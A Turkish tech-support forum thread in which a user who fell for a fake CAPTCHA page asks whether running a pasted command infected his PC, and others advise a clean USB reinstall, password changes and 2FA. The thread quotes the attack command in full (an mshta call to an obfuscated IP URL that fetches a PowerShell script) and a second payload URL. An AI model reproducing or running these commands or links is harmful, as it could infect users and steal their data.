Çözüldü Sahte VerifyCaptcha tarafından virüs gelmiş olabilir mi?

akiff0 · Perşembe 16:32

windows + r yaptırıp mshta http://162.0xfc.0xc6.122/nw/exnw.dcm bunu yazdırdı nedir bu ? cmd açıldı bilgi sızdırmış olabilir mi ipye benziyor

Lusadris · Perşembe 16:50

Çok yüksek ihtimalle zararlı hocam. Powershell scripti çalıştırıyor.

akiff0 · Perşembe 17:05

Lusadris dedi:
@akiff0, içeriğini bilmediğim için net bir şey diyemem. Ama genel olarak fileless çalışan bir şeyse tespit edilmesi bayağı zor olur. Ben sizin yerinizde olsam atardım.

Tamamdır hocam teşekkür ederim.

Arda Keçeci · Perşembe 17:05

Lusadris dedi:
@Arda Keçeci, olay dosya değil. Mshta ile bu dosyayı çalıştırıyor. Bu dosya da URL'den PowerShell scriptini çekip çalıştırıyor. Asıl olay PowerShell scriptinde. Tarayıcıdan gözükmüyor o da tabii. Şimdi bakamadım ama %99 zararlıdır.

Evet hocam fazla bakmamıştım gördüm linki. Tarayıcıdanda açılııyor rahat 50-100k satırlık kodu çalıştırıyor link bu.

Kod:

https://ferriounjkb.one/hyrt.obb

Kodun çoğu base64 çevrilmiş 5 milyon karakter var. Gemini'ye attım o linkteki dosyayı: https://gemini.google.com/share/b70d3d553704 kodu baştan sona inceleyecek halim yoktu

Lusadris · Perşembe 17:07

Arda Keçeci dedi:
Evet hocam fazla bakmamıştım gördüm linki. Tarayıcıdanda açılııyor rahat 50-100k satırlık kodu çalıştırıyor link bu.

Şimdi gördüm hocam, haklısınız. Ben aynı linke girmeyi denediğimde girmemişti. Şimdi açmış olabilir internete, veya belirli aralıklarla da açıyor olabilir. Bunun ne olduğunu anlamak mümkün değil.

@akiff0, kesinlikle temiz kurulum yapın hocam.

akiff0 · Perşembe 17:10

Lusadris dedi:
Şimdi gördüm hocam, haklısınız. Ben aynı linke girmeyi denediğimde girmemişti. Şimdi açmış olabilir internete, veya belirli aralıklarla da açıyor olabilir. Bunun ne olduğunu anlamak mümkün değil.

@akiff0, kesinlikle temiz kurulum yapın hocam.

Tamamdır hocam teşekkür ederim Windowsun kendi sıfırla özelliğinden format atmak temizmidir yoksa flasha gerek var mı hocam.

Arda Keçeci · Perşembe 17:10

akiff0 dedi:
Tamamdır hocam teşekkür ederim Windows'un kendi sıfırla özelliğinden format atmak temiz midir yoksa flasha gerek var mı hocam.

Flash ile temiz format atın hocam hem daha hızlı hem daha temiz.

Lusadris · Perşembe 17:11

@akiff0, USB'den yapmanız daha iyi olacaktır. Bu arada mümkünse ISO dosyasını farklı bir cihazdan yazdırın. Aynı zamanda şu anki cihanızındaki giriş yapılı hesapların şifrelerini değiştirip yoksa 2FA koymanızda fayda var.

akiff0 · Perşembe 17:15

Lusadris dedi:
@akiff0, USB'den yapmanız daha iyi olacaktır. Bu arada mümkünse ISO dosyasını farklı bir cihazdan yazdırın. Aynı zamanda şu anki cihanızındaki giriş yapılı hesapların şifrelerini değiştirip yoksa 2FA koymanızda fayda var.

Sağ olun hocam.

Arda Keçeci · Perşembe 17:36

Kodu unlock edip çevirmek ne bilgisayarım için ne de sitelerin sunucuları için iyi bir seçenek değilmiş onu anladım. Bilgisayar sıkıntı olmasa incelerdimde izin vermedi. Technopat bile kaldırmadı kodu atamıyorumda. Bu arada kodu cidden çok uzun ve çok karışık. Yapan bayağı titiz şekilde yapmış hocam.

Lusadris · Perşembe 17:43

@Arda Keçeci, hocam sosyal mühendislik tarafı da gayet iyiydi. Antivirüs yine çay içmiş. Boş zamanımda üşenmezsem ben de bakacağım. Kaliteli bir şeye benziyor.

akiff0 · Perşembe 17:43

Arda Keçeci dedi:
Kodu unlock edip çevirmek ne bilgisayarım için ne de sitelerin sunucuları için iyi bir seçenek değilmiş onu anladım. Bilgisayar sıkıntı olmasa incelerdimde izin vermedi. Technopat bile kaldırmadı kodu atamıyorumda. Bu arada kodu cidden çok uzun ve çok karışık. Yapan bayağı titiz şekilde yapmış hocam.

Eki Görüntüle 2588786

Hocam format kesin çözüm mü?

Çözüldü Sahte VerifyCaptcha tarafından virüs gelmiş olabilir mi?

Ayrıntılı düzenleme

akiff0

Yoctopat

Lusadris

akiff0

Yoctopat

Arda Keçeci

Hectopat

Lusadris

Megapat

akiff0

Yoctopat

Arda Keçeci

Hectopat

Lusadris

Megapat

akiff0

Yoctopat

Arda Keçeci

Hectopat

Lusadris

Megapat

akiff0

Yoctopat

Benzer konular